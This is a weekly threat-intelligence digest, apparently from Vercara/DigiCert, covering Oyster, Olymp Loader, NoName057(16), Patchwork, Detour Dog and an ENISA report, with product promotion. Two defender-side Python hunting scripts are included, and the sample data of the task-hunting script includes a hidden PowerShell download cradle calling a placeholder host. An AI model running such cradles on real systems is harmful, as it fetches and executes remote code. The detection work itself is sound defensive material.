Here is your weekly summary of news and other public coverage relevant to Vercara, the market leader in DNS, DDoS Mitigation, Web Application Firewalls, and Bot Management. Keep reading to learn about the week’s interesting and informative stories. To see all the OSINT reports, click here.
NOTE: Except where indicated, this report is released as TLP: CLEAR and items in it may be shared but not attributed to Vercara. For more information on the Traffic Light Protocol, the definitions and usage are at https://www.first.org/tlp/.
Fake Microsoft Teams Installers Push Oyster Malware via Malvertising
(TLP: CLEAR) Hackers are abusing SEO poisoning and malvertising to distribute the Oyster backdoor through fake Microsoft Teams installers. Oyster, also known as Broomstick and CleanUpLoader, has been active since mid-2023 and is used by various cybercriminal campaigns, including ransomware groups like Rhysida, to gain initial access to corporate networks. In the latest campaign, identified by Blackpoint SOC, threat actors created a fake download site, teams-install[.]top, that appears in search engine results when users search for “Teams download.” Although the domain does not spoof Microsoft directly, it mimics the Teams site’s appearance and delivers a malicious file named MSTeamsSetup.exe, the same name used by Microsoft’s legitimate installer. The fake installer is code-signed with certificates from “4th State Oy” and “NRM NETWORK RISK MANAGEMENT INC” to increase its legitimacy. When executed, it drops a malicious DLL (CaptureService.dll) into the %APPDATA%\Roaming directory. Persistence is maintained via a scheduled task that executes the DLL every 11 minutes, ensuring the backdoor remains active. Oyster provides attackers with remote access, enabling command execution, payload deployment, file transfers, and data exfiltration. This campaign mirrors earlier fake software installers for Google Chrome and PuTTY that were also used to distribute Oyster. The attack highlights the ongoing abuse of search ads and trusted software brands to trick users, particularly IT administrators, into downloading malware. The tactic leverages user trust in search results and remains a powerful method for establishing footholds in enterprise environments.
(TLP: CLEAR) Comments: The Oyster backdoor campaign leveraging fake Microsoft Teams installers demonstrates how malicious actors continue to blend social engineering with technical abuse of trusted platforms to establish footholds in enterprise networks. By exploiting SEO poisoning and malvertising, attackers ensure their malicious download sites rank highly in search results or appear as ads, significantly increasing the likelihood of unsuspecting users—especially IT administrators—downloading them. What makes this campaign particularly effective is the combination of legitimacy cues: familiar filenames like MSTeamsSetup.exe and the use of code-signed certificates. These tactics exploit user trust in both the software brand and digital signatures, making detection by non-technical users—and even some security solutions—much more difficult. Once installed, the malware creates persistence through scheduled tasks, granting attackers remote access for command execution, file transfer, and payload deployment. This aligns with Oyster’s history of being used by ransomware operators like Rhysida, indicating its value as an initial access tool in broader attack chains. From a strategic perspective, this highlights how threat actors are increasingly abusing the software supply chain ecosystem indirectly by mimicking trusted tools. The reliance on search engines as vectors also underscores a shift in initial access tactics—attackers are prioritizing the manipulation of online trust systems over brute-force or direct exploit approaches. The campaign also raises concerns about scalability. Since SEO poisoning can be automated and replicated across countless tools (e.g., Teams, Chrome, PuTTY, WinSCP), Oyster’s delivery method could easily be adapted to target other widely used enterprise software. This, combined with the malware’s modular backdoor capabilities, positions it as a persistent enabler of ransomware campaigns and broader intrusions across corporate environments.
(TLP: CLEAR) Recommended best practices/regulations: PCI-DSS V4.0 Section 5.2: “Malicious software (malware) is prevented or detected and addressed.
An anti-malware solution(s) is deployed on all system components, except for those system components identified in periodic evaluations per Requirement 5.2.3 that concludes the system components are not at risk from malware. The deployed anti-malware solution(s):
- Detects all known types of malware.
- Removes, blocks, or contains all known types of malware.
Any system components that are not at risk for malware are evaluated periodically to include the following:
- A documented list of all system components not at risk for malware.
- Identification and evaluation of evolving malware threats for those system components.
- Confirmation whether such system components continue to not require anti-malware protection.
The frequency of periodic evaluations of system components identified as not at risk for malware is defined in the entity’s targeted risk analysis, which is performed according to all elements specified in Requirement 12.3.1.”
Section 5.2 lays out requirements for malware detection and blocking across all devices in the Cardholder Data Environment (CDE). Every device inside the CDE should run malware protection that is kept updated and monitored, and an infection, once detected, should be acted upon.
(TLP: CLEAR) DigiCert: Digicert’s Protective DNS solution, UltraDDR (DNS Detection and Response), functions as a recursive/resolver DNS server that receives DNS queries either via forwarding from on-network resolvers or via an endpoint client. It then uses blocklists, domain categories, artificial intelligence, or a defined policy to determine if the domain should be allowed or blocked. Blocked user traffic is then sent to a sinkhole.
New Malware-as-a-Service Olymp Loader Promises Defender-Bypass with Automatic Certificate Signing
(TLP: CLEAR) Olymp Loader is a newly observed Malware-as-a-Service (MaaS) platform—notable for being written largely in Assembly—that surfaced on underground forums and Telegram in mid-2025 and has quickly matured into a feature-rich loader and crypter suite. Advertised by an author calling themselves OLYMPO, the product is pitched as Fully Undetectable (FUD) and offers modular components (credential stealers, crypters, privilege-escalation tools) plus automatic certificate signing, deep XOR module encryption, and UAC-Flood escalation. Outpost24 and other analysts have observed real-world deployments where binaries masquerade as legitimate software (NodeJs.exe via GitHub Releases, fake installers for OpenSSL/Zoom/PuTTY/CapCut) to improve distribution and reduce suspicion. Technically, Olymp implements a multi-stage infection flow: drop to AppData, spawn persistence via startup entries and PowerShell, perform process injection (LoadPE/code-cave techniques supporting x86/x64/.NET/Java payloads), and disable or exclude Windows Defender using a “Defender Remover” module. The offering includes a range of pricing tiers (reported $50–$200) that bundle Defender bypass/removal and optional customized injection services, lowering the barrier for mid-level criminals to deploy sophisticated implants. Overall, Olymp Loader represents a significant commercialization of low-level development skill (Assembly) into an accessible, evasive MaaS product that leverages developer trust and code-signing to complicate detection and increase enterprise exposure.
(TLP: CLEAR) Comments: Olymp Loader’s emergence signals a notable inflection point in MaaS commercialization: low-level engineering (Assembly) is being productized and offered to operators who lack deep systems expertise. The decision to implement critical components in Assembly suggests the authors prioritize compact, tightly controlled execution and obfuscation at the machine-code level—traits that complicate static detection and hamper automated analysis. Coupled with deep XOR encryption, custom shellcode (LoadPE/code-cave injection), and automated certificate signing, Olymp is designed to defeat both reputation-based controls and many signature/heuristic engines. Its distribution techniques—GitHub Releases, developer-trust masquerades, and fake installers for widely used tooling—convert developer ecosystems and searchability into an indirect supply chain vector, increasing the likelihood of high-value initial access to enterprise and developer environments. Commercial pricing and bundled defensive-bypass modules materially lower the barrier to entry, enabling mid-tier criminals to deploy advanced implants at scale; that economic model accelerates commoditization and increases the churn of distinct campaigns using the same loader. Technical breadth (support for x86/x64/.NET/Java payloads, Defender exclusion automation, UAC flood escalation) expands target scope and persistence longevity, making infected hosts useful for credential harvesting, lateral movement, RaaS chains, or inclusion in proxy/DDoS infrastructures. Finally, the project profile—small team with Assembly expertise offering turnkey FUD services—creates attribution ambiguity and resilience: even if individual operators are disrupted, the toolset and signed binaries can quickly be reused or forked by other criminal actors.
(TLP: CLEAR) Recommended best practices/regulations: PCI-DSS V4.0 Section 5.2: “An anti-malware solution(s) is deployed on all system components, except for those system components identified in periodic evaluations per Requirement 5.2.3 that concludes the system components are not at risk from malware.” Using a combination of agent-based and network-based detection, such as with a Protective DNS Solution, provides overlapping protection for conventional IT assets such as laptops, desktops, and some servers but also for non-standard IT assets such as IoT devices and some servers that cannot run anti-malware software.
(TLP: CLEAR) DigiCert: Digicert’s Protective DNS solution, UltraDDR (DNS Detection and Response), supports 4 distinct detection engines to provide Defense in Depth against malware and phishing and other abuses:
- The Lists Engine allows UltraDDR customers the ability to bring their own block lists and allow lists for FQDNs, domains, IP addresses, CIDR blocks, and registrars.
- The Categories Engine uses Digicert-provided Cyber Threat Intelligence feeds in 17 categories. Administrators can enable blocking on a category with just one button click.
- The Decision Engine uses a multi-petabyte adversarial infrastructure data lake and artificial intelligence techniques to determine if a previously unseen or recently changed domain is malicious in nature.
- The Ruleset Engine allows administrators the ability to build custom rules to augment and extend the other engines of UltraDDR.
Source: https://cybersecuritynews.com/new-malware-as-a-service-olymp-loader/
NoName 057(16) Cyberattack Hits Finnish Government Websites
(TLP: CLEAR) The late September 2025 cyberattacks in Finland highlighted the ongoing threat posed by pro-Russian hacktivist group NoName 057(16). Over four consecutive days, the group conducted distributed denial-of-service (DDoS) attacks that disrupted access to Finnish government institutions and major political party websites. Targets included the Ministry of Defense, Ministry of the Interior, State Council, and Supreme Court, as well as parliamentary parties, demonstrating a deliberate attempt to undermine confidence in Finland’s digital infrastructure. Authorities confirmed that the group relied on massive traffic floods to overwhelm servers, a tactic that does not cause permanent damage but significantly disrupts operations. The Finnish Cybersecurity Center at Traficom noted that Finland has long been on NoName 057(16)’s “target list,” with this incident part of a broader campaign of coordinated digital offensives across Europe. The attacks come amid wider disruptions in Europe, with recent incidents at airports in Berlin and Brussels also attributed to pro-Russian groups. These campaigns align with Russia’s broader hybrid warfare strategy, which combines military, political, and cyber tactics to weaken NATO and EU resilience. Finland’s recent NATO accession and strong pro-Ukraine stance make it an especially visible target. By disrupting national institutions, NoName 057(16) aims to project Russian influence in Northern Europe, retaliate against Finland’s Ukraine support, and erode public trust in government systems. Although Finnish authorities restored services quickly, the attacks underscore the persistence of politically motivated cyber operations in Europe and the need for cross-border cooperation to counter long-term hybrid threats.
(TLP: CLEAR) Comments: The recent cyberattacks against Finland attributed to NoName 057(16) highlight how pro-Russian hacktivist groups continue to operate as part of Russia’s broader hybrid warfare strategy against NATO and EU members. Since its emergence in early 2022 following Russia’s invasion of Ukraine, NoName 057(16) has been one of the most visible cyber collectives supporting Kremlin narratives. It has consistently used distributed denial-of-service (DDoS) attacks to disrupt the websites of governments, media outlets, and financial institutions, often timing operations to coincide with geopolitical flashpoints such as sanctions, military aid to Ukraine, or NATO expansion. Finland’s recent accession to NATO and its strong pro-Ukraine policies make it a particularly symbolic target. By knocking government and political party websites offline for several days, NoName aimed not only to cause disruption but also to project Russian influence and undermine public trust in democratic processes. These operations rarely cause long-term technical damage, but they carry significant psychological and political weight, showcasing the ability of pro-Russian actors to paralyze digital infrastructure at will. The Finland incident also demonstrates how NoName 057(16) remains deeply intertwined with the ongoing Russia-Ukraine conflict, where cyber operations are leveraged alongside traditional military and information warfare. The persistence and propaganda-driven nature of the group underscores its role as a deniable asset for Moscow, using relatively simple but coordinated digital offensives to extend Russia’s reach beyond the battlefield.
(TLP: CLEAR) Recommended best practices/regulations: NIST Cybersecurity Framework (CSF) PR.IR-04: “Adequate resource capacity to ensure availability is maintained.” Businesses, particularly those located within NATO and allies, should maintain constant vigilance and regularly test and enhance their cybersecurity defensive capabilities, specifically DDoS mitigation strategies, architecture, monitoring, and procedures.
(TLP: CLEAR) DigiCert: Digicert UltraDDoS Protect provides proven and consistent DDoS protection for any of your assets, whether they reside in the cloud, multi-cloud, a data center, or a hybrid environment. With always-on DDoS protection, you can stop a DDoS attack instantly, and more complex DDoS attacks can be mitigated within seconds.
Source: https://insightnews.media/noname-05716-cyberattack-hits-finnish-government-websites/
Scattered Spider, ShinyHunters Restructure – New Attacks Underway
(TLP: CLEAR) A new Resecurity report has revealed an ongoing global cybercrime campaign involving the notorious LAPSUS$, ShinyHunters, and Scattered Spider, collectively dubbed the “Trinity of Chaos.” Despite earlier claims of disbanding, these groups are still active, orchestrating coordinated hacks and extortion campaigns against leading enterprises across multiple industries. Analysts warn that the true scale of breaches is much larger than what has been disclosed publicly, with numerous private extortion attempts underway targeting Fortune 100 firms as well as organizations in financial services, aviation, retail, and automotive sectors. High-profile incidents tied to these groups include attacks on Qantas, AT&T, Salesforce, Jaguar Land Rover (JLR), Marks & Spencer, and Co-op. The UK’s Cyber Monitoring Centre has classified the Marks & Spencer and Co-op breaches as Category 2 events, estimating financial losses between £270M–£440M. In response to the disruptive JLR cyberattack, the UK government announced a £1.5 billion ($2 billion) loan guarantee for the automaker. Resecurity emphasizes that these threat actors are leveraging their notoriety to pressure victims into silence, using ongoing extortion to prevent disclosure of further breaches. Their operations demonstrate a dangerous evolution of “Gen Z” cybercrime groups, blending high-profile data theft with reputational coercion. The report suggests that the “Trinity of Chaos” is likely to continue expanding its influence, with more victims and compromised data expected to surface in the coming months.
(TLP: CLEAR) Comments: The resurgence of activity by the so-called “Trinity of Chaos”—LAPSUS$, ShinyHunters, and Scattered Spider—marks a dangerous phase in the evolution of global cybercrime. These groups are no longer operating in isolation but instead appear to be coordinating in ways that amplify their collective reach and impact. The blending of high-profile data theft with extortion tactics against Fortune 100 companies and critical industries such as financial services, aviation, and automotive underscores their ability to exploit both technical vulnerabilities and reputational pressure points. Historically, LAPSUS$ has specialized in social engineering and high-profile breaches, ShinyHunters in large-scale data theft and underground sales, and Scattered Spider in social engineering, SIM-swapping, and ransomware campaigns. By pooling these strengths, the alliance becomes a multifaceted threat capable of executing complex campaigns that overwhelm defenses across diverse sectors. The recent targeting of Jaguar Land Rover, Marks & Spencer, and Co-op illustrates this convergence of methods and the broadening of impact. This campaign also highlights the persistence of Gen Z-driven cybercrime groups who blend technical ability with bold, public-facing extortion strategies. Unlike more traditional financially motivated groups that operate quietly, the Trinity uses notoriety as a weapon, coercing victims into silence while amplifying their reputation. The financial impacts already visible in the UK—where breaches have triggered hundreds of millions in damages and even government loan guarantees—suggest these operations are far more than digital nuisances. If this trajectory continues, organizations should expect more aggressive campaigns, with alliances like this functioning as semi-structured cybercrime syndicates that blur the lines between hacktivism, criminal profiteering, and strategic disruption.
(TLP: CLEAR) Recommended best practices/regulations: NIST Cybersecurity Framework (CSF) DE.CM-01: “Networks and network services are monitored to find potentially adverse events.” One of the ways to detect phishing, malware droppers, and command and control (C2) is at the network level. Intrusion Detection Systems (IDS), Intrusion Prevention Systems (IPS), and next-generation firewalls can be used with a protective DNS solution to detect these malicious activities as they traverse the network, even if the initial infection occurs via physical media or on another network such as a hotel or airport.
(TLP: CLEAR) DigiCert: Digicert’s Protective DNS solution, UltraDDR (DNS Detection and Response), functions as a complement to anti-virus and Endpoint Detection and Response (EDR) agents to reduce the total amount of malware infections.
Patchwork APT Using PowerShell Commands to Create Scheduled Task and Downloads Final Payload
(TLP: CLEAR) Since mid-2025 researchers have observed a renewed campaign by the Patchwork APT against government and telecommunications organizations across Asia and Eastern Europe. The intrusions begin with spear-phishing Office documents that execute embedded PowerShell when macros are enabled; the downloader now uses dynamic, multi-URL failover and randomized scheduled-task names to ensure persistence and evade network and endpoint detection. Operators stream secondary payloads into memory (IEX/Net.WebClient) and frequently load malicious DLLs via legitimate Windows binaries, enabling credential theft, lateral movement, and deployment of bespoke C2/backdoor frameworks. Victims commonly exhibit periodic CPU spikes and anomalous outbound HTTP requests tied to scheduled task execution. By abusing native Windows scheduling and in-memory execution, Patchwork minimizes forensic artifacts and complicates detection and response.
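A defender-side hunt over exported Task Scheduler definitions for the persistence traits described in the Oyster story above (a DLL under AppData launched by rundll32 on an 11-minute repetition) and in this Patchwork summary (randomised task names driving PowerShell in-memory download cradles). This is an added example, not code from the report, Blackpoint or the researchers cited; the task XML, names, paths, URL and scoring thresholds are all constructed or assumed.

```python
"""Hunt scheduled-task XML for short repetition intervals, payloads run from
user-writable AppData, rundll32-loaded DLLs, PowerShell download cradles and
random-looking task names. All task contents are constructed sample data."""
import re
import xml.etree.ElementTree as ET

# Real Task Scheduler schema namespace used by `schtasks /query /xml` output.
NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
CRADLE_RE = re.compile(r"IEX|Invoke-Expression|Net\.WebClient|DownloadString|DownloadFile", re.I)
APPDATA_RE = re.compile(r"\\AppData\\", re.I)
ISO_DUR_RE = re.compile(r"^P(?:(\d+)D)?(?:T(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?)?$")


def task_xml(interval, command, arguments):
    """Build a minimal task definition (helper for the constructed samples)."""
    rep = f"<Repetition><Interval>{interval}</Interval></Repetition>" if interval else ""
    return (f'<Task xmlns="{NS["t"]}"><Triggers><TimeTrigger>{rep}'
            "<StartBoundary>2025-10-01T00:00:00</StartBoundary></TimeTrigger></Triggers>"
            f"<Actions><Exec><Command>{command}</Command><Arguments>{arguments}</Arguments>"
            "</Exec></Actions></Task>")


# Constructed samples: one benign vendor-style task, one Oyster-like, one Patchwork-like.
SAMPLE_TASKS = {
    "VendorUpdateTaskMachine": task_xml(
        "PT1H", r"C:\Program Files\Vendor\Updater.exe", "/check"),
    "CaptureServiceSync": task_xml(
        "PT11M", "rundll32.exe", r"C:\Users\alice\AppData\Roaming\CaptureService.dll,Start"),
    "kq7xvzt9": task_xml(
        "PT30M", "powershell.exe",
        "-w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://placeholder.invalid/s')"),
}


def interval_minutes(duration):
    """Convert an ISO-8601 duration (PT11M, PT1H, P1DT2H30M) to minutes; None if unusable."""
    m = ISO_DUR_RE.match(duration or "")
    if not m or not any(m.groups()):
        return None
    d, h, mi, s = (int(x) if x else 0 for x in m.groups())
    return d * 1440 + h * 60 + mi + s / 60


def looks_random(name):
    """Crude test: a letter-heavy name with almost no vowels, or a short letter/digit mix."""
    letters = [c for c in name if c.isalpha()]
    if len(letters) >= 6 and sum(c.lower() in "aeiou" for c in letters) / len(letters) < 0.15:
        return True
    return any(c.isdigit() for c in name) and bool(letters) and len(name) <= 12


def analyze_task(name, xml_text):
    """Return the list of findings for one task definition (empty list if clean)."""
    root = ET.fromstring(xml_text)
    findings = []
    for iv in root.iterfind(".//t:Repetition/t:Interval", NS):
        minutes = interval_minutes(iv.text)
        if minutes is not None and minutes <= 15:          # assumed threshold
            findings.append(f"repeats every {minutes:g} min")
    for ex in root.iterfind(".//t:Actions/t:Exec", NS):
        cmd = (ex.findtext("t:Command", "", NS) or "").strip()
        args = (ex.findtext("t:Arguments", "", NS) or "").strip()
        if APPDATA_RE.search(f"{cmd} {args}"):
            findings.append("executes from user-writable AppData")
        if cmd.lower().endswith("rundll32.exe") and ".dll" in args.lower():
            findings.append("rundll32 loads a DLL")
        if "powershell" in cmd.lower() and CRADLE_RE.search(args):
            findings.append("PowerShell download cradle")
    if looks_random(name):
        findings.append("random-looking task name")
    return findings


def hunt(tasks):
    """Map task name -> findings, keeping only tasks that raised at least one."""
    return {n: f for n, f in ((n, analyze_task(n, x)) for n, x in tasks.items()) if f}


if __name__ == "__main__":
    for task_name, hits in hunt(SAMPLE_TASKS).items():
        print(f"{task_name}: " + "; ".join(hits))
```

On a real host, feed `hunt()` the XML produced by `schtasks /query /xml` per task instead of `SAMPLE_TASKS`; the repetition and name heuristics are starting points to tune, not signatures.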
(TLP: CLEAR) Comments: Patchwork’s resurgence highlights the persistence and adaptability of long-running APT groups. Despite being exposed multiple times over the past decade, the group continues to evolve its tactics, techniques, and procedures (TTPs) to remain effective. The move from static URLs to multi-URL failover and randomized scheduled tasks illustrates a deliberate attempt to outpace signature-based and static defense measures. This reflects broader trends across APT operations where reliance on fileless malware, living-off-the-land techniques, and in-memory execution is increasingly common to bypass endpoint security. The group’s emphasis on persistence through scheduled tasks and PowerShell-based loaders also demonstrates how attackers prioritize stealth and long-term footholds over noisy smash-and-grab intrusions. By blending with native Windows processes and creating task names that mimic legitimate services, Patchwork increases the difficulty of attribution and detection. Their multi-stage infection chain, culminating in custom C2 frameworks and lateral movement, shows they are not opportunistic actors but strategic operators seeking to extract intelligence and maintain covert access for extended periods. The geographic targeting of government and telecommunications entities across Asia and Eastern Europe reflects both the group’s regional focus and the strategic value of these sectors. Access to such networks could allow for intelligence collection, disruption of communications, or staging of future campaigns. From a defensive perspective, this activity underscores the ongoing importance of behavioral monitoring, anomaly detection, and proactive threat hunting, since traditional controls like URL blocklists or antivirus are increasingly insufficient against sophisticated adversaries like Patchwork.
(TLP: CLEAR) Recommended best practices/regulations: NIST Cybersecurity Framework (CSF) PR.PS-05: “Installation and execution of unauthorized software are prevented”. By enforcing a content filtering policy to block typical software download sites in addition to hacker tools and P2P services, organizations reduce the amount of malware and trojan horses that are introduced into their organization unknowingly by their users. This can be done via a protective DNS or forward web proxy solution with website categories feeds.
(TLP: CLEAR) DigiCert: Digicert’s Protective DNS solution, UltraDDR (DNS Detection and Response), uses a multi-petabyte data lake filled with DNS query history and indicators of compromise from multiple Cyber Threat Intelligence (CTI) data feeds to correlate an incoming DNS query in real-time with previously observed malicious activity. This ensures that users and devices only go to safe, policy-compliant Internet locations.
Source: https://cybersecuritynews.com/patchwork-apt-using-powershell-commands/
New DNS Malware Detour Dog Delivers Strela Stealer Using DNS TXT Records
(TLP: CLEAR) Researchers have uncovered a large-scale DNS-based malware campaign—tracked as Detour Dog—that leverages thousands of compromised websites worldwide to deliver the Strela Stealer information-stealer. Rather than relying on traditional HTTP-only distribution, operators use DNS TXT records as a covert command-and-control and delivery channel: infected sites generate structured DNS queries that embed victim metadata (host, visitor IP, random token, type) to actor-controlled name servers, and TXT responses (often Base64-encoded) include “down” instructions that cause the site to fetch and relay payloads (e.g., script.php/file.php) from StarFish C2 infrastructure. The network applies conditional filtering (by geolocation and device) to limit exposure, and recent upgrades added remote-code execution capabilities on compromised hosts for multi-stage delivery. Infoblox and sinkhole data show the operation’s scale and resilience—roughly 30,000 unique domains across hundreds of TLDs and the ability to pivot C2 domains within hours after sinkholing. Originating as redirect-to-scam activity in 2023, Detour Dog has evolved into a stealthy distributed delivery platform that obscures malware provenance and complicates detection because DNS TXT traffic is infrequently monitored with the rigor applied to other channels.
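Detection logic for the DNS-TXT delivery pattern described above, as an added example that is not part of the original report or of Infoblox's research. It scans resolver log lines for TXT queries whose names pack metadata into labels and for TXT answers that are pure Base64 decoding to readable text; the log format, label layout, domains, decoded instruction and all thresholds are constructed assumptions, not the campaign's actual format.

```python
"""Flag TXT queries with metadata-style labels (embedded IPv4, deep label
structure, high-entropy tokens) and Base64-encoded TXT answers. SPF and DKIM
records are included in the sample to show they are not flagged."""
import base64
import math
import re
from collections import Counter

BASE64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")
DASHED_IP_RE = re.compile(r"^\d{1,3}-\d{1,3}-\d{1,3}-\d{1,3}$")

# Constructed log lines: "<timestamp> <client> <qtype> <qname> <rcode> <answer|->".
# The fourth line imitates the described pattern with an invented label layout
# (host token, visitor IP with dashes, random token, type) under a placeholder name server.
SAMPLE_LOG = "\n".join([
    "2025-10-02T10:15:01Z 10.0.0.5 A www.example.com NOERROR 93.184.216.34",
    '2025-10-02T10:15:02Z 10.0.0.5 TXT example.com NOERROR "v=spf1 include:_spf.example.com -all"',
    '2025-10-02T10:15:03Z 10.0.0.5 TXT sel1._domainkey.example.com NOERROR '
    '"v=DKIM1; k=rsa; p=MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCB"',
    "2025-10-02T10:15:04Z 10.0.0.9 TXT blog-victim.203-0-113-7.k3f9a2qzr8.chk.ns-placeholder.invalid "
    f'NOERROR "{base64.b64encode(b"down script.php").decode()}"',
    "2025-10-02T10:15:05Z 10.0.0.9 TXT nonexistent.example.org NXDOMAIN -",
])


def label_entropy(label):
    """Shannon entropy (bits per character) of one DNS label."""
    n = len(label)
    return -sum(c / n * math.log2(c / n) for c in Counter(label).values())


def query_indicators(qname):
    """Structural hints that a query name carries packed metadata rather than a hostname."""
    labels = qname.lower().rstrip(".").split(".")
    hits = []
    if len(labels) >= 5:                                   # assumed threshold
        hits.append("deep label structure")
    dashed = any(DASHED_IP_RE.match(l) for l in labels)
    dotted = any(all(l.isdigit() and int(l) <= 255 for l in labels[i:i + 4])
                 for i in range(len(labels) - 3))
    if dashed or dotted:
        hits.append("embedded IPv4 address")
    if any(len(l) >= 8 and any(ch.isdigit() for ch in l) and label_entropy(l) >= 3.0
           for l in labels):
        hits.append("high-entropy token label")
    return hits


def decoded_text(answer):
    """Decoded string if the whole TXT answer is Base64 decoding to printable ASCII, else None."""
    s = answer.strip().strip('"')
    if len(s) < 8 or len(s) % 4 or not BASE64_RE.match(s):
        return None
    try:
        raw = base64.b64decode(s, validate=True)
    except ValueError:                                     # binascii.Error is a ValueError
        return None
    text = raw.decode("ascii", errors="replace")
    if sum(ch.isprintable() for ch in text) / max(len(text), 1) < 0.9:
        return None                                        # DKIM keys etc. decode to DER, not text
    return text


def analyze_line(line):
    """Findings for one log line; non-TXT traffic is ignored."""
    _ts, _client, qtype, qname, _rcode, answer = line.split(" ", 5)
    findings = []
    if qtype != "TXT":
        return findings
    hits = query_indicators(qname)
    if len(hits) >= 2:                                     # require two hints to limit CDN noise
        findings.append("structured TXT query: " + ", ".join(hits))
    text = decoded_text(answer)
    if text is not None:
        findings.append(f"Base64 TXT answer decodes to {text!r}")
    return findings


def scan(log_text):
    """Return {qname: findings} for every line that raised at least one finding."""
    out = {}
    for line in log_text.splitlines():
        if line.strip():
            findings = analyze_line(line)
            if findings:
                out[line.split(" ", 5)[3]] = findings
    return out


if __name__ == "__main__":
    for name, hits in scan(SAMPLE_LOG).items():
        print(name, "->", "; ".join(hits))
```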
(TLP: CLEAR) Comments: The Detour Dog campaign underscores how threat actors are increasingly exploiting overlooked parts of internet infrastructure—in this case DNS—to build resilient malware delivery systems. By abusing TXT records, which are rarely inspected by traditional defenses, the operators have created a covert channel for both command-and-control and payload distribution. This technique makes attribution and takedown significantly harder, since the malicious infrastructure blends into normal DNS activity, which is foundational to internet communication. The pivot from scam redirects to direct malware delivery, particularly Strela Stealer, illustrates a strategic evolution toward financially motivated operations with broader impact. The infrastructure’s resilience—rapidly replacing C2 domains when sinkholed—shows careful planning and an ability to sustain operations at scale. The global distribution of more than 30,000 infected domains highlights both the effectiveness of the compromise and the difficulty of dismantling such a widely dispersed system. Of particular concern is how this DNS-based model can be extended beyond infostealers to more disruptive threats, including botnet formation for DDoS operations or delivery of wipers and ransomware. By embedding victim metadata in DNS queries and filtering based on geography and device, Detour Dog can tailor attacks to maximize impact while reducing exposure. This approach represents a maturing trend where DNS is weaponized not just for tunneling but as a full-fledged backbone of cybercriminal infrastructure, complicating detection and raising the bar for defenders.
(TLP: CLEAR) Recommended best practices/regulations: Cybersecurity & Infrastructure Security Agency Selecting a Protective DNS (PDNS) Service: “The Domain Name System (DNS) is central to the operation of modern networks, translating human-readable domain names into machine-usable Internet Protocol (IP) addresses. DNS makes navigating to a website, sending an email, or making a secure shell connection easier, and is a key component of the Internet’s resilience. As with many Internet protocols, DNS was not built to withstand abuse from bad actors’ intent on causing harm. ‘Protective DNS’ (PDNS) is different from earlier security-related changes to DNS in that it is envisioned as a security service – not a protocol – that analyzes DNS queries and takes action to mitigate threats, leveraging the existing DNS protocol and architecture.”
(TLP: CLEAR) DigiCert: Digicert’s Protective DNS solution, UltraDDR (DNS Detection and Response), filters internal DNS responses from users as well as machines using both defined categories, including botnet Command and Control (C2), and machine learning to detect previously uncategorized malicious associations and help prevent data exfiltration or malware detonation.
Source: https://cybersecuritynews.com/new-dns-malware-detour-dog/
Phishing Dominates EU-Wide Intrusions, says ENISA
(TLP: CLEAR) The ENISA Threat Landscape 2025 report highlights how phishing and vulnerability exploitation dominate initial access techniques in cyberattacks against EU organizations. Based on 4,875 incidents between July 2024 and June 2025, phishing accounted for 60% of intrusions, while exploitation of vulnerabilities made up 21%. Botnets (10%) and malicious applications (8%) followed, with nearly 70% of these intrusions leading to malware deployment. Outdated mobile devices and operational technology systems were flagged as high-value targets, while AI-powered phishing has surged, representing over 80% of global social engineering activity by early 2025. The report also underscores a shift toward targeting digital supply chain dependencies, where disruption at one node cascades across critical services. A notable example was the ransomware incident at Collins Aerospace that disrupted European airports, demonstrating the systemic risks. In terms of attack volume, DDoS dominated with 77% of reported incidents, though only a small fraction caused service disruption. Hacktivism emerged as the leading threat actor type, linked to 79% of attacks, often tied to geopolitical events, particularly Russian groups such as NoName057(16) leveraging the DDoSia platform. Activity frequently spiked during elections and moments of EU support for adversarial causes. Public administration was the most targeted sector (38%), largely impacted by hacktivist and state-sponsored campaigns. ENISA also warns of the growing challenge of attribution due to the blending of hacktivism and state-sponsored activity, as well as cases of “faketivism,” where state actors masquerade as hacktivists to obscure their role.
(TLP: CLEAR) Comments: The ENISA Threat Landscape 2025 report offers several critical insights into how cyber threats against EU organizations are evolving, with implications that extend well beyond the region. Phishing’s dominance as the leading initial access vector (60%) underscores how social engineering remains one of the weakest links in enterprise defenses. The fact that AI now drives over 80% of global phishing activity highlights the scalability and sophistication threat actors are achieving, allowing them to create tailored lures that bypass traditional detection at alarming speed. Vulnerability exploitation as the second most common access method (21%) reflects how patch management and legacy systems remain systemic risks, particularly in operational technology and mobile environments. The report also makes clear that DDoS is no longer just noise but a central instrument of hacktivism, accounting for 77% of attacks. Even if most did not cause lasting disruption, their sheer frequency reflects how low-cost botnets—often enabled by insecure IoT devices—continue to empower politically motivated campaigns. Russian-linked NoName057(16) and its DDoSia platform epitomize this shift, showing how hacktivism can be organized, persistent, and closely tied to geopolitical flashpoints such as elections or EU foreign policy moves. Finally, attribution is becoming more complex as the boundaries blur between state-backed campaigns and “faketivism.” This ambiguity benefits state actors who can mask strategic attacks under the guise of activism, while still inflicting reputational and operational damage on EU institutions. The heavy targeting of public administration (38%) demonstrates how adversaries are striking at symbolic, high-profile entities to amplify political messages and destabilize trust in governance.
(TLP: CLEAR) Recommended best practices/regulations: PCI-DSS V4.0 Section 5.2: “An anti-malware solution(s) is deployed on all system components, except for those system components identified in periodic evaluations per Requirement 5.2.3 that concludes the system components are not at risk from malware.” Using a combination of agent-based and network-based detection, such as with a Protective DNS Solution, provides overlapping protection for conventional IT assets such as laptops, desktops, and some servers but also for non-standard IT assets such as IoT devices and some servers that cannot run anti-malware software.
NIST Cybersecurity Framework (CSF) PR.DS-02: “The confidentiality, integrity, and availability of data-in-transit are protected.” Organizations should have a well-defined incident response plan in place that outlines the procedures to follow during a DDoS attack, including communication protocols and escalation procedures. Additionally, organizations should utilize DDoS mitigation services from reputable providers that detect and mitigate attacks in real time, such as Digicert’s UltraDDoS Protect.
(TLP: CLEAR) DigiCert: Digicert UltraDDoS Protect provides flexible, automated, and always-on protection across 15 Points of Presence (PoPs) and >15Tbps of DDoS mitigation capacity to enable customer availability and performance under even the largest and most complex DDoS attacks (layer 3 through layer 7). An automated intelligence feed that is constantly updating mitigation devices allows protection against emerging attack vectors and common attack sources.
Digicert’s Protective DNS solution, UltraDDR (DNS Detection and Response), can detect and block malware delivery and command and control (C2) techniques such as phishing, domain generation algorithms, and DNS tunneling to reduce both the quantity and impact of infections.
